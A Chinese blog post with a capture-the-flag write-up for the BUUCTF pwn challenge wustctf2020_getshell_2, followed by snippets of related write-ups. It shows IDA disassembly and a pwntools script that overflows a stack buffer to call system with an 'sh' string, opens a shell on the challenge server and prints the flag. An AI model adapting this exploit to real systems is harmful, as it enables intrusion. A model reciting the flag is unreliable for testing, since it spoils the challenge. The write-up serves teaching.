[buuctf]wustctf2020_getshell_2

最新推荐文章于 2024-02-07 03:42:45 发布
最新推荐文章于 2024-02-07 03:42:45 发布
阅读量325 收藏
点赞数
分类专栏: PWN # buuctf 文章标签: linux c语言 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_71081503/article/details/125584064
版权
buuctf 同时被 2 个专栏收录
32 篇文章 0 订阅
订阅专栏
PWN
30 篇文章 2 订阅
订阅专栏

wustctf2020_getshell_2

思路

checksec一下,发现是开了nx的,32位的
在这里插入图片描述
之后拖入ida中进行分析。
在main函数里面直截了当的做溢出。

ssize_t vulnerable()
{
  char buf; // [esp+0h] [ebp-18h]

  return read(0, &buf, 0x24u);
}

-00000018 buf             db ?
-00000017                 db ? ; undefined
-00000016                 db ? ; undefined
-00000015                 db ? ; undefined
-00000014                 db ? ; undefined
-00000013                 db ? ; undefined
-00000012                 db ? ; undefined
-00000011                 db ? ; undefined
-00000010                 db ? ; undefined
-0000000F                 db ? ; undefined
-0000000E                 db ? ; undefined
-0000000D                 db ? ; undefined
-0000000C                 db ? ; undefined
-0000000B                 db ? ; undefined
-0000000A                 db ? ; undefined
-00000009                 db ? ; undefined
-00000008                 db ? ; undefined
-00000007                 db ? ; undefined
-00000006                 db ? ; undefined
-00000005                 db ? ; undefined
-00000004                 db ? ; undefined
-00000003                 db ? ; undefined
-00000002                 db ? ; undefined
-00000001                 db ? ; undefined
+00000000  s              db 4 dup(?)
+00000004  r              db 4 dup(?)
+00000008
+00000008 ; end of stack variables

之后这里直接写入shell地址会发生这种情况无法执行的问题,因为发现一堆无用的数据在前面,导致压入system的时候无法执行,不知道这是什么命令。

.text:0804851B
.text:0804851B ; Attributes: bp-based frame
.text:0804851B
.text:0804851B                 public shell
.text:0804851B shell           proc near
.text:0804851B ; __unwind {
.text:0804851B                 push    ebp
.text:0804851C                 mov     ebp, esp
.text:0804851E                 sub     esp, 8
.text:08048521                 sub     esp, 0Ch
.text:08048524                 push    offset command  ; "/bbbbbbbbin_what_the_f?ck__--??/sh"
.text:08048529                 call    _system
.text:0804852E                 add     esp, 10h
.text:08048531                 nop
.text:08048532                 leave
.text:08048533                 retn
.text:08048533 ; } // starts at 804851B
.text:08048533 shell           endp
.text:08048533
.text:08048534

我们那就直接把sh提取出来,利用rop工具。
在这里插入图片描述
之后是call system的地址。

.text:08048529                 call    _system

之后脚本形成

脚本

from pwn import *
#p = process("./wustctf2020_getshell_2")
context(os = 'linux',arch = 'i386',log_level = 'debug')
p = remote('node4.buuoj.cn',25384)
payload = b'a'*(0x18+0x04)+p32(0x08048529)+p32(0x08048670)
p.recv()
p.sendline(payload)
p.sendline(b'cat flag')
p.interactive()

直接获得flag是flag{7db5edef-bc9a-43c6-853e-97e56f62e7da}

逆向萌新
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
buuctf wustctf2020_getshell_2 ret2shellcode
weixin_45441024的博客
12-01 673
BUUCTF wustctf2020_getshell_2 check一下,32位的程序且没有开任何保护 用ida打开,vuln很明显这是一个漏洞函数,f5查看一下伪代码,可以看到buf距离栈底0x18个字节 这是shell函数的伪代码,我们可以看到虽然这个并不是我们想要的shell(不是/bin/sh),但是程序里面有sh的字符串可以供我们利用,那我们现在就查找一下"sh"所在的位置 $ ROPgadget --binary '/home/pwn/Desktop/wustctf2020_getshe
buu-[WUSTCTF2020]level1
qaq517384的博客
03-01 177
64位 和一个output.txt 查看主函数 int __cdecl main(int argc, const char **argv, const char **envp) { FILE *stream; // ST08_8 signed int i; // [rsp+4h] [rbp-2Ch] char ptr[24]; // [rsp+10h] [rbp-20h] unsigned __int64 v7; // [rsp+28h] [rbp-8h] v7 = __readf
[BUUCTF-pwn]——wustctf2020_getshell_2
Y_peak的博客
03-19 422
[BUUCTF-pwn]——wustctf2020_getshell_2 有system没有sh。所以找一下 exploit from pwn import * p = remote('node3.buuoj.cn',25464) sh = 0x08048670 payload = 'a' * (0x18 + 4) + p32(0x08048529) + p32(sh) p.sendline(payload) p.interactive()
wustctf2020_getshell_2
m0sway的博客
12-13 2192
wustctf2020_getshell_2 使用checksec查看: 只开启了栈不可执行,应该和1一样是道栈溢出题目。 放进IDA中查看: 和1一样主函数中给出漏洞函数,漏洞函数中直接一个栈溢出。 但是后门函数并没有直接给出system(/bin/sh),而是给了system("/bbbbbbbbin_what_the_f?ck__--??/sh") 这样就不能直接调用后门函数进行getshell。虽然没有给/bin/sh,但是这串字符串的最后sh可以用作参数,同样可以获取到shell。 记录下地
BUUCTF:bjdctf_2020_babystack2(write up)
qq_44768749的博客
08-24 1593
BUUCTF:bjdctf_2020_babystack20x01文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01文件分析 64位程序,开启了栈不可执行、部分RELRO保护 0x02 运行 先输入name的长度,再输入name 0x03 IDA 输入nbytes的长度要小于10 同时给出了后面函数直接getshell 0x04 思路 比较nbytes和10的大小,可以利用符号溢出漏洞,输入一个负数,进而输入name的时候可以实现栈溢出跳转到后门函数ge
BUUCTF_PWN_test_your_nc详细题解
qq_46238551的博客
10-20 3095
test_your_nc_1 IDA PRO查看主函数 发现system("/bin/sh"),从主函数进入则执行getshell,所以直接nc或者写一个交互程序都可以getshell。 gdb动态分析,b main下主函数断点,r运行,看一下跳转到system函数后具体的执行过程 n单步执行,将程序调整到运行system函数之前 n单步执行,运行system(“/bin/sh”),观察getshell 本地gdb调试成功后,运行exp拿到flag exp.py ``..
Maccms8RceBypass_horsen9f_getshell
09-29
Maccms8RceBypass_horsen9f_getshell_MacCMSgetshell_菜刀工具mac_eatenihy_源码.rar
[WUSTCTF2020]颜值成绩查询 1
qq_51553814的博客
08-22 663
[WUSTCTF2020]颜值成绩查询 1 解题 就是一个布尔盲注,尝试自己写了一下python脚本,磕磕绊绊最后还是写出来了 主要是学了一个二分法,理解了一下 import requests url="http://f8aed0d0-ab96-4a36-8022-2a70701fe282.node4.buuoj.cn:81/?stunum=" name='' for i in range(1,100): print(i) low=32 high=128 mid=(lo
BUUCTF pwn——wustctf2020_getshell_2
CNS-Enterprise BCC-1701-J
05-23 145
BUUCTF 做题练习
[BUUCTF]PWN——wustctf2020_getshell1/2
mcmuyanga的博客
11-11 1223
wustctf2020_getshell 附件 步骤: 例行检查,32位程序,开启了NX保护 本地试运行一下程序,看看大概的情况 32位ida载入,习惯性的检索程序里的字符串,发现了后门函数 shell_addr=0x804851B main函数开始看程序 vulnerable函数 buf参数存在溢出漏洞,正好溢出8位,让我们覆盖到ret exp: from pwn import* r=remote('node3.buuoj.cn',29690) shell_addr=0x804851B
BUUCTF--[SUCTF 2018]GetShell
qq_46263951的博客
07-17 528
$_=[]; //array $__=$_.$_; /arrayarray $_=($_==$__);//$_=(array==arrayarray) false 0 $__=($_==$_);//$__=(array==array) true 1 echo ~茉[$____];//s echo ~内[$____];//y echo ~茉[$____];//s echo ~苏[$____];//t echo ~的[$____];//e echo ~咩[$____];//m echo ~课[$__...
[buuctf]wustctf2020_getshell
逆向萌新的博客
07-02 661
[buuctf]wustctf2020_getshell
pwn旅行之[WUSTCTF 2020]getshell2(一些小知识)
最新发布
qq_66013948的博客
02-07 522
Linux下查找文件(find、grep命令)_linux查找文件-CSDN博客find 路径 -name "文件名"之后就是根据题目猜测flag文件的名字,最后通过上一条语句进行查找,当然,如果猜不到,那么还是只有挨个找了。
wustctf2020_getshell
m0sway的博客
11-28 785
wustctf2020_getshell 使用checksec查看: 只开启了一个栈不可执行,没开Canary,考虑栈溢出题目。 拉进IDA中查看: 主函数中直接给漏洞函数,跟进: read()函数,能读取0x20的数据,buf距离ebp0x18,因为这是个32位的程序,ebp+4后还能放下一个one_gadget 首先考虑下这个程序本身有没有get_shell的函数,通过搜索字符串可以发现函数shell(): ok了,这题直接秒了。 exp: from pwn import * #start
BUUCTF:[SUCTF 2018]GetShell
末初的CSDN博客
08-01 1866
题目地址:https://buuoj.cn/challenges#[SUCTF%202018]GetShell if($contents=file_get_contents($_FILES["file"]["tmp_name"])){ $data=substr($contents,5); foreach ($black_char as $b) { if (stripos($data, $b) !== false){ die("illegal cha
WUST-CTF2020(武汉科技大学第一届"WUST-CTF"网络安全竞赛)WP
weixin_45461609的博客
03-30 3602
WUST-CTF2020Webcheck inadmin(不会web勉强做出)PWNgetshellgetshell2number gameCrypto大数运算B@se情书babyrsa佛说:只能四天MISC比赛规则Space ClubWelcomegirlfriend爬ShopRECr0ssFunlevel1level2level3 Web check in 修改maxlength,删除按钮的d...
hadoop_getshell
09-05
hadoop_getshell指的是利用Hadoop漏洞获取系统shell权限。Hadoop是一个开放源代码的分布式存储和计算框架,被广泛应用于大数据处理。但是,由于Hadoop的复杂性和开放性,可能存在各种漏洞和安全风险。 Hadoop_getshell通常是通过利用Hadoop的可远程读写文件的特性进行的攻击。攻击者利用该特性上传恶意的Jar文件,这个Jar文件包含了指令,能够执行系统命令,从而获取到服务器的shell权限。 一旦攻击者成功获取到shell权限,他们就可以在系统中执行各种操作,包括但不限于查看、修改、删除敏感数据,制造破坏或者窃取敏感信息。 防范hadoop_getshell攻击的关键是加强Hadoop集群的安全性。以下是一些常见的防御措施: 1. 及时更新Hadoop的版本和补丁,以修复已知的安全漏洞。 2. 限制Hadoop集群的访问权限。只有授权用户才能访问和操作集群。 3. 配置防火墙,限制对Hadoop集群的外部访问。 4. 定期审查Hadoop集群的日志,寻找异常行为和潜在的安全威胁。 5. 定期进行安全扫描和漏洞扫描,发现潜在的安全漏洞并及时修复。 6. 加强系统的监控和入侵检测,及时发现并应对异常活动。 7. 对Hadoop集群进行访问控制,使用强密码、多因素认证等加固账户安全。 8. 监控网络流量,发现并阻止异常的数据传输行为。 9. 定期进行安全培训和意识提升,提高员工对安全风险和攻击手段的认知。 总之,要防范hadoop_getshell攻击,需要综合应用多种防御措施,不断加强Hadoop集群的安全性,保护好大数据环境中的敏感信息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

逆向萌新

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值